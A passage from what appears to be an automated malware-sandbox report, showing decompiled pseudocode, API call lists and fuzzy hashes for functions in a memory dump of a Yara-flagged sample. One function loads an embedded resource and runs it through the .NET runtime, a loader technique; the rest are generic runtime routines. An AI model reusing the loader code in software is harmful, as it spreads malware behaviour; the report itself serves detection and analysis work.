					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                                        0x0040149f
                                        0x004014a5
                                        0x004014a9
                                        0x004014ec
                                        0x004014ee
                                        0x004014ee
                                        0x004014b7
                                        0x004014bb
                                        0x004014c7
                                        0x004014cd
                                        0x004014d3
                                        0x004014d8
                                        0x004014e0
                                        0x004014e0
                                        0x004014d8
                                        0x004014e6
                                        0x00000000

                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                        • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                        • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                        • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                        • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                          • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                        • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                        • ExitProcess.KERNEL32 ref: 004014EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                        • String ID: v4.0.30319
                                        • API String ID: 2372384083-3152434051
                                        • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                        • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                        • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                        • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                                        0x00401e22
                                        0x00401e28

                                        APIs
                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                        • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                        • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                        • Instruction Fuzzy Hash:
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                                        0x004055c5
                                        0x004055cf
                                        0x004055d3
                                        0x004055e4
                                        0x004055e8
                                        0x004055ed
                                        0x004055f3
                                        0x004055f8
                                        0x004055fd
                                        0x00405602
                                        0x00405609
                                        0x004055d5
                                        0x004055d5
                                        0x004055d5
                                        0x00405614

                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: EnvironmentStrings$Free
                                        • String ID:
                                        • API String ID: 3328510275-0
                                        • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                        • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                                        • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                        • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403ECE, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 95%
                                        			E00403ECE(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x4132b0, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E00403829();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E00404831())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E004068FD(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









                                        0x00403ece
                                        0x00403ed4
                                        0x00403ed9
                                        0x00403ee7
                                        0x00403ee7
                                        0x00403eed
                                        0x00403eef
                                        0x00403eef
                                        0x00403f06
                                        0x00403f0f
                                        0x00403f17
                                        0x00000000
                                        0x00000000
                                        0x00403ef7
                                        0x00403ef9
                                        0x00403f1b
                                        0x00403f20
                                        0x00403f26
                                        0x00000000
                                        0x00403f26
                                        0x00403efc
                                        0x00403f01
                                        0x00403f02
                                        0x00403f04
                                        0x00000000
                                        0x00000000
                                        0x00403f04
                                        0x00000000
                                        0x00403f06
                                        0x00403edf
                                        0x00403ee5
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004043D5,00000001,00000364,?,?,?,00404836,0040374F,?,00401678,00000000,00000002), ref: 00403F0F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
                                        • Instruction ID: 17ee06be1e01d9d3fac17571a9f3cb3756af6567e7794f1bcf3b52ff780cb40a
                                        • Opcode Fuzzy Hash: d0bbbf152570b497e93db0e472088487dc34fac96c5e1095bbbdb5b9e8cbb6b8
                                        • Instruction Fuzzy Hash: BFF0B432904122A6DB216F269C05A6B3F6CEF81772B148537BD04F62D0CB38DE1186ED
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                                        0x00403e3d
                                        0x00403e43
                                        0x00403e49
                                        0x00403e7b
                                        0x00403e80
                                        0x00403e86
                                        0x00000000
                                        0x00403e86
                                        0x00403e4d
                                        0x00403e4f
                                        0x00403e4f
                                        0x00403e66
                                        0x00403e6f
                                        0x00403e77
                                        0x00000000
                                        0x00000000
                                        0x00403e57
                                        0x00403e59
                                        0x00000000
                                        0x00000000
                                        0x00403e5c
                                        0x00403e61
                                        0x00403e62
                                        0x00403e64
                                        0x00000000
                                        0x00000000
                                        0x00403e64
                                        0x00000000

                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                        • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                                        • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                                        • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00DFD01D, Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.727088778.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4d93a2252448cd9e914cf663f38a833380aec50827b123031932ddd029ee8d8f
                                        • Instruction ID: 665b07bfa1f7c352fd2c203460ac9e28d91f13363c0ac1da9e435cdbd4b70480
                                        • Opcode Fuzzy Hash: 4d93a2252448cd9e914cf663f38a833380aec50827b123031932ddd029ee8d8f
                                        • Instruction Fuzzy Hash: 73012B71408348AAE7204E22DCC0777BBDAEF45768F1DC41AEE440B246CB79D845C6B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00DFD005, Relevance: .0, Instructions: 45COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.727088778.0000000000DFD000.00000040.00000001.sdmp, Offset: 00DFD000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2742b0ccd2bcf4bc1e739734afe9b71e6a07a4ccd0d2b825c37c5d6f64ce443f
                                        • Instruction ID: 6a11073bf5accc629b2e7f7385b61dc0cfb559f5770e7ddd8fdd29053dc77469
                                        • Opcode Fuzzy Hash: 2742b0ccd2bcf4bc1e739734afe9b71e6a07a4ccd0d2b825c37c5d6f64ce443f
                                        • Instruction Fuzzy Hash: DD01296140E3C49FD7128B258C94B62BFB49F53224F1EC1DBD9848F2A7C2699849C772
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 00404A29, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 72%
                                        			E00404A29(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v28;
				signed int _v32;
				WCHAR* _v36;
				signed int _v48;
				intOrPtr _v556;
				intOrPtr _v558;
				struct _WIN32_FIND_DATAW _v604;
				intOrPtr* _v608;
				signed int _v612;
				signed int _v616;
				intOrPtr _v644;
				intOrPtr _v648;
				void* __edi;
				signed int _t40;
				signed int _t45;
				signed int _t48;
				signed int _t50;
				signed int _t51;
				signed char _t53;
				signed int _t62;
				void* _t64;
				union _FINDEX_INFO_LEVELS _t66;
				union _FINDEX_INFO_LEVELS _t67;
				signed int _t70;
				intOrPtr* _t71;
				signed int _t74;
				void* _t80;
				void* _t82;
				signed int _t83;
				void* _t87;
				WCHAR* _t88;
				intOrPtr* _t92;
				intOrPtr _t95;
				void* _t97;
				signed int _t98;
				intOrPtr* _t102;
				signed int _t105;
				void* _t108;
				intOrPtr _t109;
				void* _t110;
				void* _t112;
				void* _t113;
				signed int _t115;
				void* _t116;
				union _FINDEX_INFO_LEVELS _t117;
				void* _t121;
				void* _t122;
				void* _t123;
				signed int _t124;
				void* _t125;
				signed int _t130;
				void* _t131;
				signed int _t132;
				void* _t133;
				void* _t134;

				_push(__ecx);
				_t92 = _a4;
				_t2 = _t92 + 2; // 0x2
				_t108 = _t2;
				do {
					_t40 =  *_t92;
					_t92 = _t92 + 2;
				} while (_t40 != 0);
				_t115 = _a12;
				_t95 = (_t92 - _t108 >> 1) + 1;
				_v8 = _t95;
				if(_t95 <= (_t40 | 0xffffffff) - _t115) {
					_t5 = _t115 + 1; // 0x1
					_t87 = _t5 + _t95;
					_t122 = E00403ECE(_t95, _t87, 2);
					_t97 = _t121;
					__eflags = _t115;
					if(_t115 == 0) {
						L6:
						_push(_v8);
						_t87 = _t87 - _t115;
						_t45 = E004047AD(_t97, _t122 + _t115 * 2, _t87, _a4);
						_t132 = _t131 + 0x10;
						__eflags = _t45;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t80 = E00404CA2(_a16, __eflags, _t122);
							E00403E03(0);
							_t82 = _t80;
							goto L8;
						}
					} else {
						_push(_t115);
						_t83 = E004047AD(_t97, _t122, _t87, _a8);
						_t132 = _t131 + 0x10;
						__eflags = _t83;
						if(_t83 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00404649();
							asm("int3");
							_t130 = _t132;
							_t133 = _t132 - 0x260;
							_t48 =  *0x412014; // 0x368bd1fa
							_v48 = _t48 ^ _t130;
							_t109 = _v28;
							_t98 = _v32;
							_push(_t87);
							_t88 = _v36;
							_push(_t122);
							_push(_t115);
							_t123 = 0x5c;
							_v644 = _t109;
							_v648 = 0x2f;
							_t116 = 0x3a;
							while(1) {
								__eflags = _t98 - _t88;
								if(_t98 == _t88) {
									break;
								}
								_t50 =  *_t98 & 0x0000ffff;
								__eflags = _t50 - _v612;
								if(_t50 != _v612) {
									__eflags = _t50 - _t123;
									if(_t50 != _t123) {
										__eflags = _t50 - _t116;
										if(_t50 != _t116) {
											_t98 = _t98 - 2;
											__eflags = _t98;
											continue;
										}
									}
								}
								break;
							}
							_t124 =  *_t98 & 0x0000ffff;
							__eflags = _t124 - _t116;
							if(_t124 != _t116) {
								L19:
								_t51 = _t124;
								_t117 = 0;
								_t110 = 0x2f;
								__eflags = _t51 - _t110;
								if(_t51 == _t110) {
									L23:
									_t53 = 1;
									__eflags = 1;
								} else {
									_t112 = 0x5c;
									__eflags = _t51 - _t112;
									if(_t51 == _t112) {
										goto L23;
									} else {
										_t113 = 0x3a;
										__eflags = _t51 - _t113;
										if(_t51 == _t113) {
											goto L23;
										} else {
											_t53 = 0;
										}
									}
								}
								_t101 = (_t98 - _t88 >> 1) + 1;
								asm("sbb eax, eax");
								_v612 =  ~(_t53 & 0x000000ff) & (_t98 - _t88 >> 0x00000001) + 0x00000001;
								E00402460(_t117,  &_v604, _t117, 0x250);
								_t134 = _t133 + 0xc;
								_t125 = FindFirstFileExW(_t88, _t117,  &_v604, _t117, _t117, _t117);
								__eflags = _t125 - 0xffffffff;
								if(_t125 != 0xffffffff) {
									_t102 = _v608;
									_t62 =  *((intOrPtr*)(_t102 + 4)) -  *_t102;
									__eflags = _t62;
									_v616 = _t62 >> 2;
									_t64 = 0x2e;
									do {
										__eflags = _v604.cFileName - _t64;
										if(_v604.cFileName != _t64) {
											L36:
											_push(_t102);
											_t66 = E00404A29(_t102,  &(_v604.cFileName), _t88, _v612);
											_t134 = _t134 + 0x10;
											__eflags = _t66;
											if(_t66 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											__eflags = _v558 - _t117;
											if(_v558 == _t117) {
												goto L37;
											} else {
												__eflags = _v558 - _t64;
												if(_v558 != _t64) {
													goto L36;
												} else {
													__eflags = _v556 - _t117;
													if(_v556 == _t117) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t70 = FindNextFileW(_t125,  &_v604);
										_t102 = _v608;
										__eflags = _t70;
										_t64 = 0x2e;
									} while (_t70 != 0);
									_t71 = _t102;
									_t105 = _v616;
									_t111 =  *_t71;
									_t74 =  *((intOrPtr*)(_t71 + 4)) -  *_t71 >> 2;
									__eflags = _t105 - _t74;
									if(_t105 != _t74) {
										E004074E0(_t111 + _t105 * 4, _t74 - _t105, 4, E00404844);
									}
								} else {
									_push(_v608);
									_t66 = E00404A29(_t101, _t88, _t117, _t117);
									L26:
									_t117 = _t66;
								}
								__eflags = _t125 - 0xffffffff;
								if(_t125 != 0xffffffff) {
									FindClose(_t125);
								}
								_t67 = _t117;
							} else {
								__eflags = _t98 -  &(_t88[1]);
								if(_t98 ==  &(_t88[1])) {
									goto L19;
								} else {
									_push(_t109);
									_t67 = E00404A29(_t98, _t88, 0, 0);
								}
							}
							__eflags = _v12 ^ _t130;
							E004018CC();
							return _t67;
						} else {
							goto L6;
						}
					}
				} else {
					_t82 = 0xc;
					L8:
					return _t82;
				}
				L40:
			}




























































                                        0x00404a2e
                                        0x00404a2f
                                        0x00404a36
                                        0x00404a36
                                        0x00404a39
                                        0x00404a39
                                        0x00404a3c
                                        0x00404a3f
                                        0x00404a44
                                        0x00404a4e
                                        0x00404a51
                                        0x00404a56
                                        0x00404a5e
                                        0x00404a61
                                        0x00404a6b
                                        0x00404a6e
                                        0x00404a6f
                                        0x00404a71
                                        0x00404a85
                                        0x00404a85
                                        0x00404a88
                                        0x00404a92
                                        0x00404a97
                                        0x00404a9a
                                        0x00404a9c
                                        0x00000000
                                        0x00404a9e
                                        0x00404aa2
                                        0x00404aab
                                        0x00404ab1
                                        0x00000000
                                        0x00404ab3
                                        0x00404a73
                                        0x00404a73
                                        0x00404a79
                                        0x00404a7e
                                        0x00404a81
                                        0x00404a83
                                        0x00404aba
                                        0x00404abc
                                        0x00404abd
                                        0x00404abe
                                        0x00404abf
                                        0x00404ac0
                                        0x00404ac1
                                        0x00404ac6
                                        0x00404aca
                                        0x00404acc
                                        0x00404ad2
                                        0x00404ad9
                                        0x00404adc
                                        0x00404adf
                                        0x00404ae2
                                        0x00404ae3
                                        0x00404ae6
                                        0x00404ae7
                                        0x00404aea
                                        0x00404aed
                                        0x00404af3
                                        0x00404afd
                                        0x00404b19
                                        0x00404b19
                                        0x00404b1b
                                        0x00000000
                                        0x00000000
                                        0x00404b00
                                        0x00404b03
                                        0x00404b0a
                                        0x00404b0c
                                        0x00404b0f
                                        0x00404b11
                                        0x00404b14
                                        0x00404b16
                                        0x00404b16
                                        0x00000000
                                        0x00404b16
                                        0x00404b14
                                        0x00404b0f
                                        0x00000000
                                        0x00404b0a
                                        0x00404b1d
                                        0x00404b20
                                        0x00404b23
                                        0x00404b3f
                                        0x00404b41
                                        0x00404b43
                                        0x00404b45
                                        0x00404b46
                                        0x00404b49
                                        0x00404b5f
                                        0x00404b61
                                        0x00404b61
                                        0x00404b4b
                                        0x00404b4d
                                        0x00404b4e
                                        0x00404b51
                                        0x00000000
                                        0x00404b53
                                        0x00404b55
                                        0x00404b56
                                        0x00404b59
                                        0x00000000
                                        0x00404b5b
                                        0x00404b5b
                                        0x00404b5b
                                        0x00404b59
                                        0x00404b51
                                        0x00404b69
                                        0x00404b71
                                        0x00404b75
                                        0x00404b83
                                        0x00404b88
                                        0x00404b9d
                                        0x00404b9f
                                        0x00404ba2
                                        0x00404bd7
                                        0x00404be2
                                        0x00404be2
                                        0x00404be7
                                        0x00404bed
                                        0x00404bee
                                        0x00404bee
                                        0x00404bf5
                                        0x00404c12
                                        0x00404c12
                                        0x00404c21
                                        0x00404c26
                                        0x00404c29
                                        0x00404c2b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404bf7
                                        0x00404bf7
                                        0x00404bfe
                                        0x00000000
                                        0x00404c00
                                        0x00404c00
                                        0x00404c07
                                        0x00000000
                                        0x00404c09
                                        0x00404c09
                                        0x00404c10
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404c10
                                        0x00404c07
                                        0x00404bfe
                                        0x00000000
                                        0x00404c2d
                                        0x00404c35
                                        0x00404c3b
                                        0x00404c41
                                        0x00404c45
                                        0x00404c45
                                        0x00404c48
                                        0x00404c4a
                                        0x00404c50
                                        0x00404c57
                                        0x00404c5a
                                        0x00404c5c
                                        0x00404c70
                                        0x00404c75
                                        0x00404ba4
                                        0x00404baa
                                        0x00404bae
                                        0x00404bb6
                                        0x00404bb6
                                        0x00404bb6
                                        0x00404bb8
                                        0x00404bbb
                                        0x00404bbe
                                        0x00404bbe
                                        0x00404bc4
                                        0x00404b25
                                        0x00404b28
                                        0x00404b2a
                                        0x00000000
                                        0x00404b2c
                                        0x00404b2c
                                        0x00404b32
                                        0x00404b37
                                        0x00404b2a
                                        0x00404bcb
                                        0x00404bce
                                        0x00404bd6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404a83
                                        0x00404a58
                                        0x00404a5a
                                        0x00404ab4
                                        0x00404ab9
                                        0x00404ab9
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /
                                        • API String ID: 0-2043925204
                                        • Opcode ID: a75e177558c569fd39184c31dfa081bd759cdd70b54121f1ff0abb0e518020ef
                                        • Instruction ID: ba1068fc9c078a1ad814dd17ce5e53bd1395a2ce151ae24c2f61dc23761eb13f
                                        • Opcode Fuzzy Hash: a75e177558c569fd39184c31dfa081bd759cdd70b54121f1ff0abb0e518020ef
                                        • Instruction Fuzzy Hash: 7C411AB16002196ACB249FB9DC49EBB77B8EBC4714F50427AFA05E72C0E674DD41CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 70%
                                        			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x368bd1fa
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                                        0x004078d4
                                        0x004078d5
                                        0x004078d6
                                        0x004078dd
                                        0x004078e2
                                        0x004078e8
                                        0x004078ee
                                        0x004078f4
                                        0x004078f7
                                        0x004078f7
                                        0x004078fa
                                        0x004078fc
                                        0x004078fc
                                        0x004078fa
                                        0x004078fe
                                        0x00407903
                                        0x0040790a
                                        0x0040790d
                                        0x0040790d
                                        0x00407929
                                        0x0040792f
                                        0x00407934
                                        0x00407ac7
                                        0x00407ad2
                                        0x00407ada
                                        0x0040793a
                                        0x0040793a
                                        0x0040793d
                                        0x00407942
                                        0x00407946
                                        0x0040799a
                                        0x0040799a
                                        0x0040799c
                                        0x0040799e
                                        0x00407abc
                                        0x00407abc
                                        0x00407abe
                                        0x00407abf
                                        0x00407ac5
                                        0x00000000
                                        0x00407ac5
                                        0x004079af
                                        0x004079b5
                                        0x004079b7
                                        0x00000000
                                        0x00000000
                                        0x004079bd
                                        0x004079cf
                                        0x004079d4
                                        0x004079d8
                                        0x00000000
                                        0x00000000
                                        0x004079e5
                                        0x00407a1f
                                        0x00407a22
                                        0x00407a25
                                        0x00407a27
                                        0x00407a29
                                        0x00407a2b
                                        0x00407a77
                                        0x00407a77
                                        0x00407a79
                                        0x00407a79
                                        0x00407a7b
                                        0x00407ab5
                                        0x00407ab6
                                        0x00000000
                                        0x00407abb
                                        0x00407a8f
                                        0x00407a94
                                        0x00407a96
                                        0x00000000
                                        0x00000000
                                        0x00407a9a
                                        0x00407a9b
                                        0x00407a9c
                                        0x00407a9f
                                        0x00407adb
                                        0x00407ade
                                        0x00407aa1
                                        0x00407aa1
                                        0x00407aa2
                                        0x00407aa2
                                        0x00407aaf
                                        0x00407ab1
                                        0x00407ab3
                                        0x00407ae4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00407ab3
                                        0x00407a2d
